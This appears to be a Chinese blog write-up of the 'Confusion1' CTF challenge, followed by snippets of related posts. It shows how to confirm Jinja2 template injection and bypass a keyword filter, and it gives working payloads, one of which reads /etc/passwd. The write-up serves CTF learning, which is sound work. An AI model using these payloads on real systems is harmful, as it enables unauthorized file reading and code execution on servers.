攻防世界----confusion1

已于 2022-07-24 10:55:49 修改
阅读量1.2k 收藏 3
点赞数 1
分类专栏: ctf相关 文章标签: 安全
于 2022-07-22 11:56:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_44418229/article/details/125924948
版权
本文详细介绍了如何在Python应用中识别SSTI漏洞,并提供了两种绕过方法:直接字符串拼接和参数传递。通过实例演示了如何利用__class__等关键字绕过过滤,适合进阶开发者学习SSTI防范与利用知识。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

知识点1:如何确定存在SSTI注入

知识点2:有些关键字被禁了,如何绕过

一.如何确定存在SSTI

 

 根据网站图片和题目描述的提示,大象是php,蟒蛇是python,说明了这个网站是用python写的

在python中,比较常规的漏洞就是SSTI模板注入

尝试验证漏洞

 

很明显,是存在漏洞的 

同时,也存在过滤关键字段 

二.SSTI绕过

参考链接:

SSTI模板注入绕过(进阶篇)_yu22x的博客-优快云博客_ssti绕过

SSTI模板注入及绕过姿势(基于Python-Jinja2)_Y4tacker的博客-优快云博客_ssti绕过

经过一系列参数的提交,发现过滤了这些字段

class,mro,subclasses

方法1

通过拼接字符串即

.__class__ -> ["__c""lass__"]
.->[]     __class__ -> "__c""lass__"

需要注意的是,代表函数的()需要放在[]外面 

方法2

通过传递参数绕过

GET方式

{{''.__class__}} => {{''[request.args.t1]}}?t1=__class__

 

POST方式:需要分成两步走

{{ ''[request.value.class][request.value.mro][2][request.value.subclasses]()[40]('/etc/passwd').read() }}

接着给这个页面发一个post的请求包

class=__class__&mro=__mro__&subclasses=__subclasses__

攻防世界 web高手进阶区 7分题Confusion1
闵行小鱼塘
10-11 3124
继续ctf的旅程,开始攻防世界web高手进阶区的7分题,本文是Confusion1的writeup
攻防世界web高手进阶wp-Confusion1
Whaocai的博客
08-03 391
考点:python ssti 点进去看到url是index.php,页面上有一张图片,蛇和象。我们都知道蛇代表php,大象代表python,猜测有关php+python的题 点击login和register,发现都报错。F12又发现了flag文件存放的位置,接下来就是考虑何如读取到该文件。 寻找别的信息,看看有没有robots.txt,发现没有该文件,御剑扫描也没扫出什么有用的信息。 ctf中出有关python的题型很大一部分是ssti,于是就尝试模板注入,发下确实存在ssti漏洞,这下就有思路来读取fla
攻防世界-Confusion1
m0_49025459的博客
02-14 688
访问题目场景某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)然后结合图片我们知道,这个网址是python写的,那python语言书写的网址,存在最多的大概率是SSTI模板注入。
攻防世界 - Web - Level 4 | Confusion1
最新发布
Blue17 の 小窝
05-01 1091
好的,下面的问题是怎么构造 Payload 能进行读取文件,或者直接执行系统命令。页面成功返回执行后的结果,看来我们成功绕过了对方的 WAF。它报错的太全了,连你访问的路径都报出来了。通过查看页面源码,我们成功获得了 Flag 文件的保存路径,备注中还有一个叫 Salt 文件的,暂时不知道有啥用。OK,知道了基础,下面我们就是往 {{}} 里填入代码了,我们先慢慢测,使用。既然能执行运算,那其他代码,不也就可以咯。仔细观察页面回显的报错信息,输出了 /49,说明我们的。
攻防世界Confusion1
qq_43774856的博客
12-09 867
Confusion1 打开链接,如图所示 点击login,发现无法访问,查看一下源码,有flag的信息 看了题解后知道是SSTI 使用{{7*7}} 最常用的 {{''.__class__.__mro__[2].__subclasses__()}} 发现被过滤了 经过测试,过滤了很多关键字,如class,subclasses等。 这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__ {{''.__class__}} => {{''[
攻防世界Confusion1
wangzhemvp的博客
04-09 724
request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) "。所以我们可以利用request.args绕过输入黑名单,进行沙箱逃逸。php的标志是大象,Python的标志是蛇。Python 的 Flask 框架( Flask 使用 Jinja2 作为模板引擎 )输入 {{config}} 也有回显,ssti。过滤了关键字,并未过滤request。点进register.php。
攻防世界--Confusion1
m0_67467924的博客
05-30 487
a=__class__&b=__mro__&c=__subclasses__查找可以使用的基类,使用base报错,但是mro可以,我不懂,先做着吧{{''[request.args.a][request.args.b]}}?
攻防世界-web高手进阶区
zji
04-25 6986
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
WriteUp-攻防世界-MISC Become_a_Rockstar
weixin_57806437的博客
05-27 1279
附件为Become_a_Rockstar.rock Leonard Adleman says star Problem Makers is Problem Makers Problem Makers says NCTF{ God takes World A boy says flag The boy is Bob Evil takes your mind A girl says no flag The girl is Alice Truths were ctf hoster violently F
攻防世界 web高手进阶区 10分题Confusion2
闵行小鱼塘
10-13 1173
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Confusion2的writeup
攻防世界misc高手进阶篇教程(3)
玄道的网安博客
05-27 4642
Miscmisc 用010editor打开图片,然后看到jpg图片,把后缀修改成zip 有个压缩包是加密过的,还有张图片,我们看看图片 看到了flag.txt,再次把图片后缀修改成zip 发现可以解压,得到一个 flag.txt 文件,咦,,,,,刚才解压chayidian.zip文件时,目录下也有一个flag.txt 文件,很明显这是一个明文攻击,又已知 是.zip加密,上工具 Advanced Zip Password Recover。 在这里我跑出密码 z$^58a4w
攻防世界web进阶区 Confusion1
akxnxbshai的博客
01-24 3673
攻防世界web进阶区 Confusion1 难度系数: 四星 题目来源: XCTF 4th-QCTF-2018 题目描述:某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器) 题目提到了php,打开网址首先看到一张图 蛇缠在大象身上猜测此系统使用了php+python (php的标志是大象,Python的标志是蛇) 然后进入了注册页面发现flag的位置 想到了本题可能存在Python ..
攻防世界 Confusion1
CyhDl666的博客
02-26 334
进入页面 index.php页面查看了源码,没有什么发现 进入Login.php页面 返回404??? 查看一下源码 从这里看可能是个SSTI模板注入 这里推荐个初学者的SSTI文章SSTI y 确定是SSTI模板注入 按照正常的注入流程{{''.__class__.__mro__}} 页面返回的是 从这里来看应该是存在一个过滤 想到做过的SSTI题目 shrine用的是url_for函数 尝试一下 ...
攻防世界WEB】难度四星12分进阶题:Confusion1
07-23 854
攻防世界WEB】四星12分
【愚公系列】2023年05月 攻防世界-Web(Confusion1
时光隧道
05-27 7957
SSTI漏洞(Server Side Template Injection,服务端模板注入漏洞)是一种 web 应用程序中的安全漏洞,它允许攻击者通过在模板中注入恶意代码,执行服务器端的任意代码。模板通常用于 web 应用程序中的动态内容生成,这些模板经常包含逻辑控制语句和变量插入。攻击者可以利用模板中缺乏输入验证和过滤来注入任意的代码,从而实现任意代码执行,甚至是远程命令执行。SSTI漏洞是一种危险性较高的漏洞,因为攻击者可以完全控制服务器端执行的代码和结果。
攻防世界-web-Confusion1
wuh2333的博客
11-22 272
攻防世界,web,SSTI
攻防世界web进阶区 Confusion1 之request.args.key
snowlyzz的博客
05-12 701
又是一道新知识点的题收获很大,现在刷的webctf题都是要依靠大佬的wp,唉,还是太菜了。 刚进页面就蒙蔽了,什么都不知道。扫了一下目录和git 没有任何线索。。 看了下师傅们的WP。 点进去index。php 可以看到报错, 看到url url的信息会在页面上看到,猜测是ssTI注入 具体可以看:SSTI注入查看下源 FLAG文件显示出位置 一般来说 SSTI的注入payload都是 {{"".__class__.__mro__[2].__subclasses__()[4...
SSTI 攻防世界 Confusion1
weixin_73399382的博客
07-24 938
具体来说,__class__是一个内置属性,表示一个对象所属的类。即""[request.args.__class__]和"".__class__效果是一样的,但是因为在语句中过滤了基础类,我们可以采取变量赋值的方式绕过限制。解析:"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes),而不是对象(objects)。综上所述,"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes)。
使用TensorFlow实现CIFAR-10图像识别
1. **环境搭建**:首先需要安装TensorFlow库以及其他辅助的Python库,例如NumPy、Matplotlib等。由于TensorFlow支持GPU加速,如果需要进行大规模训练,还需要安装CUDA和cuDNN。 2. **数据加载和预处理**: - 使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jjj34

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值